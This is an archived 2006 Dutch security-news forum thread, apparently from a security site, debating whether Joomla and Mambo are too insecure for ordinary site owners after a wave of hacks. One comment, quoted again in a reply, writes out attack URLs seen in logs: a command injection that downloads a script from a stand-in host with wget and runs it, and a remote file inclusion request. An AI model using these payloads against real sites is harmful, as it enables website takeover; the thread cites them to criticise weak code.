Archief - De topics van lang geleden

Joomla! en Mambo niet voor iedereen geschikt

19-07-2006, 14:18 door Redactie, 24 reacties

De afgelopen dagen zijn er honderden Nederlandse websites gehackt via een van de vele lekken in Mambo of Joomla!. De open source content management systemen staan bekend om hun gebruiksvriendelijkheid en vele mogelijkheden en worden door miljoenen websites gebruikt. De software presenteert zich ook als makkelijk te installeren, eenvoudig te beheren, betrouwbaar en voor iedereen geschikt.

Alleen al in juli zijn er vier zeer ernstige lekken in modules en uitbreidingen voor beide pakketten gevonden. Lekken waardoor een aanvaller op eenvoudige wijze een website kan overnemen of aanpassen.

Het is allemaal goed en aardig dat mensen via twee krachtige tools hun website op het internet plaatsen, enig bewustzijn dat de website gehackt kan worden kan geen kwaad.

Eerlijkheid gebied te zeggen dat het voor de doorsnee Joomla! en Mambo gebruiker waarschijnlijk onbegonnen werk is om alle security advisories bij te houden en regelmatig de software bij te werken. Wil je echter niet door een van talloze scriptkiddies gehackt worden heb je gewoon geen keuze. Onze stelling luidt derhalve: Joomla! en Mambo niet voor iedereen geschikt

Reacties (24)
19-07-2006, 14:29 door Walter
Eens, Joomla en mambo zo *veel* te uitgebreid. Heel veel
mensen installeren het, vergeten veel opties die ze niet
gebruiken uit te schakelen,w aardoor ze vaak niet eens in de
gaten hebben dat ze vatbaar zijn voor security leaks.

Je moet dit soort portals alleen gebruiken als je weet waar
je mee bezig bent, en je jezelf goed informeert over de
mogelijkheden 9en eventuele tekortkomingen) van de portal.
19-07-2006, 14:31 door Anoniem
Gelukkig staat de joomla portal die ik half om half beheer
achter een iChain Appliance :)
19-07-2006, 14:59 door Anoniem
Niet voor mij iig... wat een lastig menu...
19-07-2006, 15:04 door Peter_
Tja, het is net als Windows. Mooi, makkelijk, easy install,
uitgebreid. Veel mensen gebruiken het DUS veel hackers
hacken het.

Ik beheer meerdere Joomla sites. Maar je moet er wel wat
voor doen om een site goed (lees veilig) te krijgen. Als je iets niet
gebruikt dan moet je het uitschakelen. (Modules en componenten kunnen gewoon weggehaald worden als je ze niet gebruikt). Net als bij Windows.
Ook de filesecurity is aan te passen Standaard staat het
OPEN. dus moet je het handmatig dichtzetten.

En, Ja, ik ben het met de stelling eens. Ga eerst eens kijken naar wat je echt gebruikt voordat je een uitgebreid pakket selecteerd. Je hebt misschien niet alles van Joomla nodig zodat je ook een kaal pakket kan selecteren.

Door Anoniem
Gelukkig staat de joomla portal die ik half om half beheer
achter een iChain Appliance :)
Maakt dat de applicaties Joomla dan echt veiliger?
En welke Joomla site is dat dan?
19-07-2006, 15:10 door Anoniem
@ de redactie:

En wat is er dan WEL voor iedereen geschikt..?

Enkel "holle" kritiek geven op software levert geen enkele bijdrage
aan een zinvolle discussie omtrent Joomla software.

Joomla word zeer goed onderhouden door haar ontwikkel team en
de "lekken" waarover geschreven word zitten / zaten in modules en
niet in de kern van de software. En als er een lek in de Joomla kern
word gevonden dan is er vaak binnen 1 week een patch
beschikbaar.

Daarnaast is het altijd noodzakelijk om de server(s) goed
geconfigureerd te hebben, IDS / IPS systemen horen daar ook bij.

Via mijn hosting partner (http://www.mevershosting.nl) kan vrijwel
IEDEREEN Joomla gebruiken aangezien zij heel goed weten hoe
servers veilig geconfigureerd moeten worden.

B
19-07-2006, 15:28 door Skizmo
...via een van de vele lekken in Mambo of Joomla!

stelling : lekke/brakke software is voor niemand geschikt.
19-07-2006, 15:49 door SirDice
Door Anoniem
Gelukkig staat de joomla portal die ik half om half beheer achter een iChain Appliance :)
Alsof dat iChain spul SQL injection en remote file inclusion tegenhoudt. Ik heb even snel de documentatie doorgekeken maar het is toch vooral een pakket wat hoofdzakelijk bedoelt is voor single-sign-on (authenticatie) en niet voor application/content (laag 7) filtering.
19-07-2006, 17:29 door G-Force
Joomla! en Mambo niet voor iedereen geschikt

Geldt ook voor Windows.
19-07-2006, 17:32 door G-Force
bedoelt is

SirDice...dit moet zijn: bedoeld is
19-07-2006, 17:49 door SirDice
Door Peter.V
bedoelt is

SirDice...dit moet zijn: bedoeld is
T.o.o... h.o.t... C.o.r.e... t.e.m.p.e.r.a.t.u.r.e..
c.r.i.t.i.c.a.l.. S.h.u.t.t.i.n.g.. d.o.w.n.. t.o.
p.r.e.v.e.n.t....b.r.a.i.n.. m.e.l.t.d.o.w.n...
19-07-2006, 17:50 door Anoniem
Ik denk ook dat de taak is van de ontwikkelaars om niet
alles standaard open te zetten.
19-07-2006, 19:33 door Anoniem
@ de redactie

phpnuke en postnuke niet voor idereen geschikt !
windows en Linux niet voor iedereen geschikt !
MS Office en OpenOffice niet voor iedereen geschikt !
...

Dat is maar een heel vaag en niet doordacht berichtje.

Ik heb al meerdere CMS-systemen onder handen gehad van
phpnuke, postnuke, mambo, typo3,...en ben bij joomla blijven
hangen.
en geen enkel systeem is 100% veilig.
Of het nu een cms of andere software of hardware is.
Alles is te hacken. Het is alleen een vraag van geduld en tijd.

Bij de ene gaat het wat eenvoudiger als bij de een andere.
Maar bij joomla word het tamelijk snel onder handen genomen.
Kijk maar eens naar de tijd dat verlopen is van joomla 1.0.9
naar 1.0.10
Dat waren maar een paar weken.

Bij php-nuke kan je dat ver gaan zoeken. Want dat moeten
andere voor hun oplossen :-(

Ik kan er lang over zeveren.
Maar ik vind dat de redactie gerust eens wat meer tijd met
joomla kan verbrengen voordat met zulke berichten publiceerd

cu
20-07-2006, 00:02 door Sheriff
ik was dus slachtoffer door mijn eigen stommiteit. inmiddels
is de website weer online, de site en zijn componenten
ge-update, en in het vervolg de nieuwsbrief maar beter in de
gaten houden voor nieuwe releases.

Maar dat updaten is zo ingewikkeld nog niet hoor... je moet
het alleen wel ffies doen. Net als een backup maken van je
systeem/websites/etc... veel mensen hebben dit ook op de
kwade manier moeten leren.
20-07-2006, 08:38 door bastv
de meeste lekken zitten altijd nog in 3th party addons.
Veel mensen denken dat hé dat ziet er leuk uit maar weten niet dat het
slecht geprogrammeerd is.
20-07-2006, 10:30 door Anoniem
Geen enkel redelijk uitgebreid en modulair CMS systeem zoals
Mambo is bedoeld voor beginners. De installatie is voor de
meeste nog wel te doen. Maar de hoeveelheid aan componenten,
modules en parameters en het doorkrijgen van het
achterliggende concept is andere koek. Net zoals het
up-to-date houden....

Kortom, een CMS is niet voor 'mietjes'
20-07-2006, 15:11 door Anoniem
Als ik zie hoe ze binnen komen dan vind ik dat wel heel
knullig geprogrammeerd:
/index.php?cmd=cd%20/tmp;wget%20http://bla.ru/script.txt;/tmp/script.txt.
of
/bla.php?include=http://bla.ru/script.txt
Dat is toch gewoon de deur open zetten vooor hackers!!!
Ik zou zeggen tegen mambo/joomla: leer eens programmeren!

Ik heb inmiddels url filters in apache toegepast zodat mijn
klanten ongegeneerd lekke versies van joomla/mambo kunnen
draaien.

Dus ik ben het met de stelling eens. Niet geschikt voor
iedereen.
21-07-2006, 13:08 door Anoniem
Door Anoniem
Als ik zie hoe ze binnen komen dan vind ik dat wel heel
knullig geprogrammeerd:
/index.php?cmd=cd /tmp;wget http://bla.ru/script.txt;/tmp/script.txt.
of
/bla.php?include=http://bla.ru/script.txt
Dat is toch gewoon de deur open zetten vooor hackers!!!
Ik zou zeggen tegen mambo/joomla: leer eens programmeren!

Ik heb inmiddels url filters in apache toegepast zodat mijn
klanten ongegeneerd lekke versies van joomla/mambo kunnen
draaien.

Dus ik ben het met de stelling eens. Niet geschikt voor
iedereen.

ipv af te zeiken kan je misschien beter behulpzaam zijn.

http://forum.joomla.org/index.php?board=267.0

met een beetje verstand kom je er wel uit.
23-07-2006, 11:56 door Anoniem
Door Anoniem
ipv af te zeiken kan je misschien beter behulpzaam zijn.
http://forum.joomla.org/index.php?board=267.0
met een beetje verstand kom je er wel uit.

het is allemaal fijn dat dat nu niet meer kan, maar dat het
ooit gekunt heeft geeft wel aan dat er niet netjes vanaf het
begin gewerkt is. en nog steeds duiken er wormen op die
zulke sites massaal aanpaken, dat zegt wat.
23-07-2006, 18:03 door G-Force
Door SirDice
Door Peter.V
bedoelt is

SirDice...dit moet zijn: bedoeld is
T.o.o... h.o.t... C.o.r.e... t.e.m.p.e.r.a.t.u.r.e..
c.r.i.t.i.c.a.l.. S.h.u.t.t.i.n.g.. d.o.w.n.. t.o.
p.r.e.v.e.n.t....b.r.a.i.n.. m.e.l.t.d.o.w.n...

Jeetje SirDice...hoeveel zorg voor al die puntjes.............
23-07-2006, 18:04 door G-Force
...ipv af te z(pieeep) kan je misschien beter behulpzaam zijn.

Schuttingtaalachtige contructies worden hier niet gewaardeerd.
24-07-2006, 10:49 door Anoniem
ALLES wat door een mens gemaakt wordt kan door een ander mens
vernietigd worden. Simpel. Dat geldt ook voor Joomla. Evenals voor alle
andere software. Hoeveel geld steekt de industrie wel niet in het beveiligen
van software e.d.? En niks heeft tot nu toe geholpen. Windows krijgt ook
constant commentaar op lekken die ontdekt worden. Dus is windows ook
niet geschikt voor beginners (Ik heb een virus. Ik heb een Trojan.Bla bla
bla)? Het is wel het populairste OS!

Als je je een klein beetje verdiept in Joomla! en de community bijhoudt,
kun je veel problemen voorkomen.
24-07-2006, 15:08 door Anoniem
Door Anoniem
Ik heb inmiddels url filters in apache toegepast zodat mijn
klanten ongegeneerd lekke versies van joomla/mambo kunnen
draaien.
Kun je wat meer vertellen over url filters in apache? Of wellicht een link?
Zeggen dat je het hebt opgelost zonder de oplossing te vertellen maakt
niemand wijzer...
01-08-2006, 00:12 door Anoniem
Enkele opmerkingen naar aanleiding van deze thread:
- Joomla en Mambo zijn feitelijk de enige middelen om een
beetje site in elkaar te knutselen. Van leven ga je dood,
tja....
- Als miljoenen sites hiermee zijn gebouwd, hoe groot is dan
de kans dat precies jouw site wordt gehackt?
- En als jouw site wordt gehackt, wat dan nog? De
desbetreffende CMS's zijn leuk voor voetbalclubs en
wijkverenigingen, maar je haalt het toch niet in je hoofd om
ze voor commerciële doeleinden te gebruiken?
- Wie kan er nog Nederlands:
- Eerlijkheid gebied te zeggen
- voordat je een uitgebreid pakket selecteerd
- Joomla word zeer goed onderhouden
- vooral een pakket wat hoofdzakelijk bedoelt is (wat -> dat)
- alleen een vraag van geduld en tijd (vraag -> kwestie)
- gekunt

ALLES wat door een mens gemaakt wordt kan door een ander mens
vernietigd worden.
Móóóie gedachte, in al zijn triestheid.

Harry
13-04-2008, 19:16 door Anoniem
als je het mij vraagt is het gebruik van joomla of mambo zoiezo al niet veilig en
dat zal het zeker niet worden. Vooral vanwege het feit dat mensen overhaaste
beslissingen nemen door joomla te installeren. Vaak is de reden "dan hoef ik
teminste niks te kunnen". Maar iedere ECHTE webontwikkelaar met
programmeer ervaring weet dat open source applicaties zoals joomla en
mambo vaak stikken van de lekken.

Daarom is mijn advies. Ga een programmeer taal leren en vertrouw niet op
kant en klare templates en/of webapplicaties maar ga voor maatwerk. dat is
het echte werk!
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.